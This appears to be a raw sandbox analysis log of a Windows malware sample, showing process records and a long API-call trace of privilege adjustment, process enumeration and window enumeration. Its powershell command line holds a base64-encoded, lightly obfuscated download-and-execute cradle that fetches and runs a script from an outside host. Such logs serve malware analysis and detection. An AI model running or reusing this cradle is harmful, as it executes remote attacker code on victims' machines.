	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 289
	os_tid = 0xe40


Thread:
	id = 409
	os_tid = 0x1050


Thread:
	id = 412
	os_tid = 0x105c


Thread:
	id = 1514
	os_tid = 0x1c24


Thread:
	id = 1518
	os_tid = 0x1ab8


Thread:
	id = 1581
	os_tid = 0x2130


Thread:
	id = 1695
	os_tid = 0x23b4


Process:
	id = "50"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x16cdc000"
	os_pid = "0xe5c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 291
	os_tid = 0xe60

	[0566.276] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0572.278] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0572.278] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0572.278] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0572.279] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0589.679] GetVersionExW (in: lpVersionInformation=0x20dcc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20dcc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0589.681] GetVersionExW (in: lpVersionInformation=0x20dcc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20dcc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0589.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0589.694] GetVersionExW (in: lpVersionInformation=0x20da30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20da30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0589.695] SetErrorMode (uMode=0x1) returned 0x1
	[0589.696] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x20db90 | out: lpFileInformation=0x20db90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0589.697] SetErrorMode (uMode=0x1) returned 0x1
	[0590.942] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x20de00 | out: lpdwHandle=0x20de00) returned 0x94c
	[0590.944] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c072d8 | out: lpData=0x2c072d8) returned 1
	[0590.947] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dd78, puLen=0x20dd70 | out: lplpBuffer=0x20dd78*=0x2c07374, puLen=0x20dd70) returned 1
	[0590.950] lstrlenW (lpString="䅁") returned 1
	[0590.959] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c07450, puLen=0x20dce0) returned 1
	[0590.959] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0590.961] CoTaskMemAlloc (cb=0x2e) returned 0x4dbca0
	[0590.962] lstrcpyW (in: lpString1=0x4dbca0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0590.977] CoTaskMemFree (pv=0x4dbca0) 
	[0590.977] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c074a4, puLen=0x20dce0) returned 1
	[0590.977] lstrlenW (lpString="System.Management.Automation") returned 28
	[0590.977] CoTaskMemAlloc (cb=0x3c) returned 0x419860
	[0590.978] lstrcpyW (in: lpString1=0x419860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0590.978] CoTaskMemFree (pv=0x419860) 
	[0590.978] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c07500, puLen=0x20dce0) returned 1
	[0590.978] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0590.978] CoTaskMemAlloc (cb=0x20) returned 0x4dc210
	[0590.978] lstrcpyW (in: lpString1=0x4dc210, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0590.978] CoTaskMemFree (pv=0x4dc210) 
	[0590.978] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c07540, puLen=0x20dce0) returned 1
	[0590.978] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0590.978] CoTaskMemAlloc (cb=0x44) returned 0x419860
	[0590.978] lstrcpyW (in: lpString1=0x419860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0590.978] CoTaskMemFree (pv=0x419860) 
	[0590.978] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c075a8, puLen=0x20dce0) returned 1
	[0590.978] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0590.978] CoTaskMemAlloc (cb=0x76) returned 0x482220
	[0590.978] lstrcpyW (in: lpString1=0x482220, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0590.978] CoTaskMemFree (pv=0x482220) 
	[0590.978] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c07644, puLen=0x20dce0) returned 1
	[0590.978] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0590.979] CoTaskMemAlloc (cb=0x44) returned 0x419860
	[0590.979] lstrcpyW (in: lpString1=0x419860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0590.979] CoTaskMemFree (pv=0x419860) 
	[0590.979] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c076a8, puLen=0x20dce0) returned 1
	[0590.979] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0590.979] CoTaskMemAlloc (cb=0x58) returned 0x43cb10
	[0590.979] lstrcpyW (in: lpString1=0x43cb10, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0590.979] CoTaskMemFree (pv=0x43cb10) 
	[0590.979] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c07724, puLen=0x20dce0) returned 1
	[0590.979] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0590.979] CoTaskMemAlloc (cb=0x20) returned 0x4dc210
	[0590.979] lstrcpyW (in: lpString1=0x4dc210, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0590.979] CoTaskMemFree (pv=0x4dc210) 
	[0590.979] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x2c073cc, puLen=0x20dce0) returned 1
	[0590.979] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0590.979] CoTaskMemAlloc (cb=0x66) returned 0x45c1a0
	[0590.979] lstrcpyW (in: lpString1=0x45c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0590.979] CoTaskMemFree (pv=0x45c1a0) 
	[0590.979] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x0, puLen=0x20dce0) returned 0
	[0590.979] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x0, puLen=0x20dce0) returned 0
	[0590.979] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x20dce8, puLen=0x20dce0 | out: lplpBuffer=0x20dce8*=0x0, puLen=0x20dce0) returned 0
	[0590.980] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dcb8, puLen=0x20dcb0 | out: lplpBuffer=0x20dcb8*=0x2c07374, puLen=0x20dcb0) returned 1
	[0590.981] CoTaskMemAlloc (cb=0x204) returned 0x484970
	[0590.981] VerLanguageNameW (in: wLang=0x0, szLang=0x484970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0590.982] CoTaskMemFree (pv=0x484970) 
	[0590.982] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\", lplpBuffer=0x20dd08, puLen=0x20dd00 | out: lplpBuffer=0x20dd08*=0x2c07300, puLen=0x20dd00) returned 1
	[0590.988] GetCurrentProcessId () returned 0xe5c
	[0592.273] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x20cc30 | out: lpLuid=0x20cc30*(LowPart=0x14, HighPart=0)) returned 1
	[0592.275] GetCurrentProcess () returned 0xffffffffffffffff
	[0592.276] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x20cc50 | out: TokenHandle=0x20cc50*=0x1c4) returned 1
	[0592.277] AdjustTokenPrivileges (in: TokenHandle=0x1c4, DisableAllPrivileges=0, NewState=0x2c0ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0592.278] CloseHandle (hObject=0x1c4) returned 1
	[0592.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe5c) returned 0x1c4
	[0592.292] EnumProcessModules (in: hProcess=0x1c4, lphModule=0x2c0abb8, cb=0x200, lpcbNeeded=0x20dc68 | out: lphModule=0x2c0abb8, lpcbNeeded=0x20dc68) returned 1
	[0592.294] GetModuleInformation (in: hProcess=0x1c4, hModule=0x13f370000, lpmodinfo=0x2c0ae28, cb=0x18 | out: lpmodinfo=0x2c0ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0592.295] CoTaskMemAlloc (cb=0x804) returned 0x4e3940
	[0592.295] GetModuleBaseNameW (in: hProcess=0x1c4, hModule=0x13f370000, lpBaseName=0x4e3940, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0592.295] CoTaskMemFree (pv=0x4e3940) 
	[0592.296] CoTaskMemAlloc (cb=0x804) returned 0x4e3940
	[0592.296] GetModuleFileNameExW (in: hProcess=0x1c4, hModule=0x13f370000, lpFilename=0x4e3940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0592.296] CoTaskMemFree (pv=0x4e3940) 
	[0592.297] CloseHandle (hObject=0x1c4) returned 1
	[0593.385] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xe5c) returned 0x1c4
	[0593.386] GetExitCodeProcess (in: hProcess=0x1c4, lpExitCode=0x20dd98 | out: lpExitCode=0x20dd98*=0x103) returned 1
	[0593.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c0b088, Length=0x20000, ResultLength=0x20dd60 | out: SystemInformation=0x12c0b088, ResultLength=0x20dd60*=0x35670) returned 0xc0000004
	[0593.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c2b0b8, Length=0x37e70, ResultLength=0x20dd60 | out: SystemInformation=0x12c2b0b8, ResultLength=0x20dd60*=0x35670) returned 0x0
	[0594.609] EnumWindows (lpEnumFunc=0x2a866ac, lParam=0x0) 
	[0600.823] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0603.336] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x558
	[0604.614] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0606.160] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0607.734] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0608.687] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x538
	[0609.268] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0609.271] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x778
	[0610.310] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x778
	[0610.714] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0610.717] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0610.718] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0611.573] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0611.575] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0611.576] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0611.577] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0612.850] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0612.853] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x460
	[0612.855] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0618.606] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x4d0
	[0618.612] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x3a8
	[0619.901] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1bd0
	[0619.906] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1bfc
	[0619.909] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1a78
	[0619.912] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1b90
	[0619.914] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1b04
	[0621.431] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1b34
	[0621.436] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1b64
	[0621.440] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1bb0
	[0621.444] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1acc
	[0621.446] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1a2c
	[0621.447] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x19a8
	[0622.788] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1944
	[0622.793] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x18c8
	[0622.796] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x18ac
	[0622.800] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x18ec
	[0622.802] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1898
	[0622.804] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xc98
	[0622.805] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x153c
	[0624.672] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1808
	[0624.682] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x12a4
	[0624.686] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1740
	[0625.438] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x16c4
	[0625.638] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1820
	[0626.456] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x16ac
	[0626.929] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1858
	[0626.934] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1664
	[0626.938] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10b4
	[0628.515] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10ac
	[0629.711] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x10ec
	[0629.717] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1068
	[0629.722] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x17e0
	[0629.725] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x102c
	[0629.728] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x17a4
	[0629.733] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1050
	[0629.735] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1694
	[0631.754] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1770
	[0631.754] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1720
	[0631.754] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x165c
	[0631.754] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1578
	[0631.754] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x16c0
	[0631.754] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x161c
	[0631.754] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1638
	[0631.755] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x15c8
	[0631.755] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1554
	[0631.755] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1674
	[0631.755] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1520
	[0631.755] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x14bc
	[0631.755] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xf8c
	[0631.755] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0xe9c
	[0631.755] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x20dac0 | out: lpdwProcessId=0x20dac0) returned 0x1434
